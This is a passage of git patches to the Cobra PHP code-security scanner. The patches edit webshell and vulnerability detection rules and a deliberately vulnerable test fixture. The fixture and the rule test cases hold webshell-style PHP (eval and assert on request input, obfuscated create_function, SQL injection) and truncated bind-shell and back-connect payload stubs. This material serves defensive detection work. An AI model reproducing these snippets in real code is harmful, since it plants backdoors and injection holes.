value="PHP反序列化漏洞"/> <language value="php"/> - <match mode="function-param-controllable"><![CDATA[is_a|unserialize]]></match> + <match mode="function-param-controllable"><![CDATA[unserialize]]></match> <level value="5"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-320002.xml b/rules/CVI-320002.xml index 189c78b5..18e4335e 100644 --- a/rules/CVI-320002.xml +++ b/rules/CVI-320002.xml @@ -3,7 +3,7 @@ <name value="extract导致变量覆盖漏洞"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[extract]]></match> - <repair mode="in-current-line"><![CDATA[extract\s*\(\s*{{PARAM}}\s*,\s*(?:EXTR_SKIP|EXTR_PREFIX_SAME|EXTR_PREFIX_ALL|EXTR_PREFIX_IF_EXISTS|EXTR_IF_EXISTS)\s*[,\)]]]></repair> + <repair mode="in-current-line"><![CDATA[extract\s*\(\s*\w*\s*,\s*(?:EXTR_SKIP|EXTR_PREFIX_SAME|EXTR_PREFIX_ALL|EXTR_PREFIX_IF_EXISTS|EXTR_IF_EXISTS)\s*[,\)]]]></repair> <level value="4"/> <test> <case assert="true"><![CDATA[extract($_GET['var']);]]></case> @@ -18,12 +18,12 @@ ## 举例 ```php <?php - $a = '0'; - extract($_GET); - if($a==1){echo "true!";} - else{echo "false!";} + $a = '0'; + extract($_GET); + if($a==1){echo "true!";} + else{echo "false!";} ?> - + ``` 构造 http://www.test.com/test.php?a=1时,会打印出true </solution> diff --git a/rules/CVI-350001.xml b/rules/CVI-350001.xml index 4383a693..b3f39240 100644 --- a/rules/CVI-350001.xml +++ b/rules/CVI-350001.xml @@ -3,7 +3,7 @@ <name value="unlink删除文件"/> <language value="php"/> <match mode="function-param-controllable"><![CDATA[unlink]]></match> - <repair block="in-function-up"><![CDATA[in_array\s*\(\s*{{PARAM}}\s*,]]></repair> + <repair block="in-function-up"><![CDATA[in_array]]></repair> <level value="3"/> <test> <case assert="true"><![CDATA[ diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index afdb2aec..2f4773e5 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell1"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|php|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> + <match mode="regex-only-match"><![CDATA[\s*\b(include|require)(_once)?\b[\s\(]*['\"][^\n'\"]{0,100}((\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\_(tmp|log))|((http|https|file|data|ftp)\://.{0,25}))['\"][\s\)]*[\r\n;/\*]+]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[include "sss.jpg";]]></case> diff --git a/rules/CVI-360002.xml b/rules/CVI-360002.xml index 2544dfde..fb6a1eea 100644 --- a/rules/CVI-360002.xml +++ b/rules/CVI-360002.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell2"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> + <match mode="regex-only-match"><![CDATA[\s*((array_filter|array_reduce|array_diff_ukey|array_udiff|uasort|uksort|usort)\s*\(+\s*.{1,100}),\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(].{1,25})\s*\)]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[array_filter($arr, base64_decode("ZXZhbA=="));]]></case> diff --git a/rules/CVI-360015.xml b/rules/CVI-360015.xml deleted file mode 100644 index 0ad11515..00000000 --- a/rules/CVI-360015.xml +++ /dev/null @@ -1,25 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell15"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[sqlite_create_function\s*\([\s\S]{0,200}(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\s\S]{0,200}sqlite_create_function\s*\(]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[ - if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); - } else { - echo 'Error opening sqlite db: ' . $sqliteerror;exit; - } - ]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml deleted file mode 100644 index ee83be9c..00000000 --- a/rules/CVI-360023.xml +++ /dev/null @@ -1,16 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell23"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php]]></match> - <level value="7"/> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml deleted file mode 100644 index 14a7e530..00000000 --- a/rules/CVI-360024.xml +++ /dev/null @@ -1,19 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell24"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\);]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml deleted file mode 100644 index a88c4111..00000000 --- a/rules/CVI-360025.xml +++ /dev/null @@ -1,19 +0,0 @@ -<?xml version="1.0" encoding="UTF-8"?> -<cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell25"/> - <language value="php"/> - <match mode="regex-only-match"><![CDATA[\$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\)]]></match> - <level value="7"/> - <test> - <case assert="true"><![CDATA[]]></case> - </test> - <solution> - ## 安全风险 - 代码中存在webshell - - ## 修复方案 - 删除 - </solution> - <status value="on"/> - <author name="Feei" email="feei@feei.cn"/> -</cobra> \ No newline at end of file diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index 61dd65ef..8a1c8ae4 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -5,7 +5,7 @@ <match mode="regex-only-match"><![CDATA[\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\()]]></match> <level value="7"/> <test> - <case assert="true"><![CDATA[]]></case> + <case assert="true"><![CDATA[assert($_SERVER["REQUEST_URI"]);]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index 265c9dbc..c9bf22ca 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml @@ -4,10 +4,22 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg..."; + ]]></case> + <case assert="true"><![CDATA[$result = python_eval("import os\nos.system('$cmd')");]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `$bind_pl="IyEvdXNyL2Jpbi9lbnYgcGV` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/knullsh.txt) + + 特征 `python_eval("import os\nos.system(` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/bdotw44shell.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index 2ac9f909..1b554b4d 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml @@ -4,10 +4,18 @@ <language value="php"/> <match mode="regex-only-match"><![CDATA[preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c]]></match> <level value="7"/> + <test> + <case assert="true"><![CDATA[ + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2..."; + ]]></case> + </test> <solution> ## 安全风险 代码中存在webshell + 特征 `$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/138shell/N/NIX%20REMOTE%20WEB-SHELL%20v.0.5%20alpha%20Lite%20Public%20Version.txt) + ## 修复方案 删除 </solution> diff --git a/rules/CVI-360033.xml b/rules/CVI-360033.xml index 14ae5598..ccac7a18 100644 --- a/rules/CVI-360033.xml +++ b/rules/CVI-360033.xml @@ -2,7 +2,7 @@ <cobra document="https://github.com/wufeifei/cobra"> <name value="webshell33"/> <language value="php"/> - <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD]]></match> + <match mode="regex-only-match"><![CDATA[PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\(\"N3tsh_surl\"\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\]|function_exists\(\"k1r4_sess_put\"\)|http://www.7jyewu.cn/|scookie\('phpspypass|PHVayv.php\?duzkaydet=|phpRemoteView</a>|define\('envlpass',|KingDefacer_getupdate\(|relative2absolute\(|Host:\s*old.zone-h.org|<h3>PHPKonsole</h3>|\$_SESSION\['hassubdirs'\]\[\$treeroot\]|strtolower\(\$cmd\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|<h1>Linux Shells</h1>|\$MyShellVersion\s*=\s*\"MyShell|<a\s*href=\"http://ihacklog.com/\"|setcookie\(\s*\"mysql_web_admin_username\"\s*\)|<title>PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\+yNjW62S|\$_uU\(83\)\.\$_uU\(84\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00|'W3D\s*Shell]]></match> <level value="7"/> <test> <case assert="true"><![CDATA[ diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index 1fae15ff..bbbb6f88 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -8,16 +8,13 @@ $cmd = $_REQUEST['a']; echo ($callback . ";"); -echo $callback; extract($cmd); - -@array_map("ass\x65rt", (array) @$cmd); +eval($cmd); $cmd = $_GET['cmd']; if (!empty($cmd)) { - eval($cmd); system('ls'+$cmd); } @@ -56,8 +53,6 @@ function curl($url) { echo get_headers($url, 1); } -print("Hello " . $cmd); - $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; mysql_query($query); mysqli_query($query); @@ -100,12 +95,10 @@ function curl($url) { unlink($file); } -header("Location: " . $_GET["url"]); - $host = $_POST['host']; $port = $_POST['port']; function GetFile($host, $port, $link) { - $fp = fsockopen($host, intval($port), $errno, $errstr, 30); + $fp = fsockopen($host, intval($port), $errno, $errstr, 30); if (!$fp) { echo "$errstr (error number $errno) \n"; } else { @@ -153,10 +146,6 @@ function GetFile($host, $port, $link) { //cvi-360006 ($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); -//cvi-360007 -//call_user_func('assert', $_REQUEST['pass']); //这种和参数可控重复 同理加密的字符串检测不出来 -//call_user_func('assert', $arr); - //cvi-360008 $a = 'assert'; call_user_func($a, $arr); @@ -177,22 +166,14 @@ function GetFile($host, $port, $link) { $sa = create_function('xxx', "eval()");$sa(); //cvi-360012 -$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));');$func($_GET['func']); +$func=@create_function('$x','ev'.'al'.'(gz'.'inf'.'late'.'(bas'.'e64'.'_de'.'co'.'de($x)));'); $func($_GET['func']); //cvi-360013 -//$id = $_GET['id'];$q = 'echo' . $id . 'is' . $a . ";";$sy = create_function('$a', $q); $sa = "eval()"; create_function('xxx', $sa); //cvi-360014 $a = "eval";$a($_GET['a']); -//cvi-360015 感觉有误报的 -if ($dbhandle = sqlite_open('mysqlitedb', 0666, $sqliteerror)) { - sqlite_create_function($dbhandle, 'func', 'eval($cmd);', 1); -} else { - echo 'Error opening sqlite db: ' . $sqliteerror;exit; -} - //cvi-360016 filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); @@ -217,6 +198,9 @@ function GetFile($host, $port, $link) { ini_set('allow_url_include, 1'); // Allow url inclusion in this script include 'php://input'; +//cvi-360027 +assert($_SERVER["REQUEST_URI"]); + //cvi-360026 $cb = 'system'; ob_start($cb); @@ -227,8 +211,20 @@ function GetFile($host, $port, $link) { eval(base64_decode( ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRndiR1J0Um5OTFExSm1WVVU1VkZaR2RHdGlNamw1V0ZOclMweDVPQzVqYUhJb05EY3BMbEJuS1NrNykpOw)); -//cvi-360032 -//<div class = bartitle><h4> '.sh_name().' </h4> .:r57 . bizDq99Shell:.</div> +//cvi-360029 +$bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg..."; + +//cvi-360030 +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2..."; + +//cvi-360031 +function zWM($NXlKO){ + $NXlKO=gzuncompress(base64_decode($NXlKO)); + for($i=0;$i<strlen($NXlKO);$i++){ + $NXlKO[$i] = chr(ord($NXlKO[$i])-1); + } + return $NXlKO; +} //cvi-360033 $shver = "Emp3ror Undetectable #18"; //Current version @@ -249,3 +245,7 @@ function GetFile($host, $port, $link) { $a = 'assert'; $arr = new ArrayObject(array('test', $_REQUEST['pass'])); $arr->uasort($a); + +//cvi-360037 +$a="http://www.test.com/sss.php"; +require_once $a; \ No newline at end of file From 966a393dd92af3df2dc9e4b6170458d24d2ef21a Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Tue, 12 Sep 2017 10:04:56 +0800 Subject: [PATCH 27/29] change status of some rules to `off` --- rules/CVI-360003.xml | 2 +- rules/CVI-360008.xml | 2 +- rules/CVI-360009.xml | 2 +- rules/CVI-360010.xml | 2 +- rules/CVI-360017.xml | 2 +- rules/CVI-360019.xml | 2 +- rules/CVI-360022.xml | 2 +- rules/CVI-360026.xml | 2 +- rules/CVI-360027.xml | 1 + rules/CVI-360032.xml | 5 ++++- rules/CVI-360036.xml | 2 +- rules/CVI-360037.xml | 2 +- tests/vulnerabilities/v.php | 27 +++++++++++++++++++++------ 13 files changed, 36 insertions(+), 17 deletions(-) diff --git a/rules/CVI-360003.xml b/rules/CVI-360003.xml index f3cc59f4..c5eba2c8 100644 --- a/rules/CVI-360003.xml +++ b/rules/CVI-360003.xml @@ -14,6 +14,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360008.xml b/rules/CVI-360008.xml index 2524f03a..bf4d99c2 100644 --- a/rules/CVI-360008.xml +++ b/rules/CVI-360008.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> diff --git a/rules/CVI-360009.xml b/rules/CVI-360009.xml index aa311c3e..5fb520a0 100644 --- a/rules/CVI-360009.xml +++ b/rules/CVI-360009.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> diff --git a/rules/CVI-360010.xml b/rules/CVI-360010.xml index 274fff85..a5e2c432 100644 --- a/rules/CVI-360010.xml +++ b/rules/CVI-360010.xml @@ -21,6 +21,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360017.xml b/rules/CVI-360017.xml index 72325724..ae7ee7bc 100644 --- a/rules/CVI-360017.xml +++ b/rules/CVI-360017.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index 6d8df0af..516085b2 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index c5bf35b3..8885040b 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml index e8d8ef15..14f10b86 100644 --- a/rules/CVI-360026.xml +++ b/rules/CVI-360026.xml @@ -31,6 +31,6 @@ ## 修复方案 删除 </solution> - <status value="on"/> + <status value="off"/> <author name="Feei" email="feei@feei.cn"/> </cobra> \ No newline at end of file diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml index 8a1c8ae4..be561ef8 100644 --- a/rules/CVI-360027.xml +++ b/rules/CVI-360027.xml @@ -6,6 +6,7 @@ <level value="7"/> <test> <case assert="true"><![CDATA[assert($_SERVER["REQUEST_URI"]);]]></case> + <case assert="true"><![CDATA[eval(getenv('HTTP_CODE'));]]></case> </test> <solution> ## 安全风险 diff --git a/rules/CVI-360032.xml b/rules/CVI-360032.xml index cf5f9d23..f29528e8 100644 --- a/rules/CVI-360032.xml +++ b/rules/CVI-360032.xml @@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell"/> + <name value="webshell32"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[\$nofuncs='no\s*exec\s*functions|udf\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|<title>Safes\s*Mode\s*Shell|Siyanur\.PHP\s*|c999shexit\(\)|\$c99sh_|c99_sess_put\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\(|coded\s*by\s*tjomi4|john\.barker446@gmail\.com|eval\(\"\\\$x=gzin\"|eval\(\"\?>\"\.gzinflate\(base64_decode\(|eval\(gzinflate\(base64_decode\(|eval\(gzuncompress\(base64_decode\(|eval\(gzinflate\(str_rot13\(base64_decode\(|function_exists\(\"zigetwar_buff_prepare\"\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\(\"IIS://localhost/w3svc\"\)|n57http-based\[\s*-\]terminal|Dosya\s*Olu|errorlog\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\(\"system\"==\$seletefunc\)\?system\(\$shellcmd\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\.'code'|phpsocks5_encrypt\(|define\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\(\$__C_C"]]> @@ -16,6 +16,9 @@ 特征 `dQ99shell` 对应webshell样例 [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/www-7jyewu-cn/%E5%9B%BD%E5%A4%96%E5%85%8D%E6%9D%80PHP%E5%A4%A7%E9%A9%AC_%E6%9C%AA%E7%BF%BB%E8%AF%91.php) + 特征 `c999shexit` 对应webshell样例 + [link](https://github.com/tennc/webshell/blob/4ca96011884b892ec15de130f76eb2a047b77493/web-malware-collection-13-06-2012/PHP/c99-bd.txt) + ## 修复方案 删除 diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml index 890ad34d..aeb85c77 100644 --- a/rules/CVI-360036.xml +++ b/rules/CVI-360036.xml @@ -18,6 +18,6 @@ ## 修复方案 删除 - + diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml index db28b4e8..89a2da81 100644 --- a/rules/CVI-360037.xml +++ b/rules/CVI-360037.xml @@ -17,6 +17,6 @@ ## 修复方案 删除 - + diff --git a/tests/vulnerabilities/v.php b/tests/vulnerabilities/v.php index bbbb6f88..e4d95c7b 100644 --- a/tests/vulnerabilities/v.php +++ b/tests/vulnerabilities/v.php @@ -7,8 +7,6 @@ $cmd = $_REQUEST['a']; -echo ($callback . ";"); - extract($cmd); eval($cmd); @@ -53,7 +51,9 @@ function curl($url) { echo get_headers($url, 1); } -$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order LIMIT $limit, $offset;"; +$size = $_GET['size']; +$order = $_GET['order']; +$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size' ORDER BY $order;"; mysql_query($query); mysqli_query($query); @@ -95,8 +95,7 @@ function curl($url) { unlink($file); } -$host = $_POST['host']; -$port = $_POST['port']; +//cvi-120004 function GetFile($host, $port, $link) { $fp = fsockopen($host, intval($port), $errno, $errstr, 30); if (!$fp) { @@ -116,6 +115,12 @@ function GetFile($host, $port, $link) { return $contents; } } +$host = $_POST['host']; +$port = $_POST['port']; +GetFile($host, $port, $link); + +//cvi-120004 +$fp = fsockopen($host, intval($port), $errno, $errstr, 30); //cvi-165001 $surname = $_GET['surname']; @@ -146,6 +151,9 @@ function GetFile($host, $port, $link) { //cvi-360006 ($code = $_POST['code']) && @preg_replace('/ad/e', '@' . str_rot13('riny') .'($code)', 'add'); +//cvi-360007 +call_user_func('assert', $arr); + //cvi-360008 $a = 'assert'; call_user_func($a, $arr); @@ -199,7 +207,7 @@ function GetFile($host, $port, $link) { include 'php://input'; //cvi-360027 -assert($_SERVER["REQUEST_URI"]); +eval(getenv('HTTP_CODE')); //cvi-360026 $cb = 'system'; @@ -226,6 +234,13 @@ function zWM($NXlKO){ return $NXlKO; } +//cvi-360032 +function c999shexit() +{ + onphpshutdown(); + exit; +} + //cvi-360033 $shver = "Emp3ror Undetectable #18"; //Current version //CONFIGURATION AND SETTINGS From ac61bd5c91192c3c54bceb024384fe31f868aad5 Mon Sep 17 00:00:00 2001 From: Feei Date: Tue, 12 Sep 2017 11:02:52 +0800 Subject: [PATCH 28/29] improves config tooltip --- cobra/config.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cobra/config.py b/cobra/config.py index 082f9a05..659ce795 100644 --- a/cobra/config.py +++ b/cobra/config.py @@ -70,7 +70,7 @@ def __init__(self, level1=None, level2=None): value = config.get(level1, level2) except Exception as e: traceback.print_exc() - logger.critical("./configs file configure failed.\nError: {0}".format(e.message)) + logger.critical("./configs file configure failed. {u}\nError: {e}".format(u='https://wufeifei.github.io/cobra/config', e=e.message)) self.value = value @staticmethod From a60cd602894f613d9ca66ff35b727302416d6eb2 Mon Sep 17 00:00:00 2001 From: Feei Date: Tue, 12 Sep 2017 11:08:45 +0800 Subject: [PATCH 29/29] Released v2.0.0-alpha.4 --- CHANGES.md | 9 +++++++++ cobra/__version__.py | 2 +- 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/CHANGES.md b/CHANGES.md index f6f09a75..f996f6f6 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -3,6 +3,15 @@ Cobra Changelog Here you can see the full list of changes between each Cobra release. +Version 2.0.0-alpha.4 +--------------------- + +Released on Sep 12 2017 + +- 增加WebShell规则和测试用例 #571 +- 支持FPC模式修复函数 #565 #559 +- 其它细节优化和Bug修复 + Version 2.0.0-alpha.3 --------------------- diff --git a/cobra/__version__.py b/cobra/__version__.py index df73639c..e5bb4536 100644 --- a/cobra/__version__.py +++ b/cobra/__version__.py @@ -7,7 +7,7 @@ __issue_page__ = 'https://github.com/wufeifei/cobra/issues/new' __python_version__ = sys.version.split()[0] __platform__ = platform.platform() -__version__ = '2.0.0-alpha.3' +__version__ = '2.0.0-alpha.4' __author__ = 'Feei' __author_email__ = 'feei@feei.cn' __license__ = 'MIT License'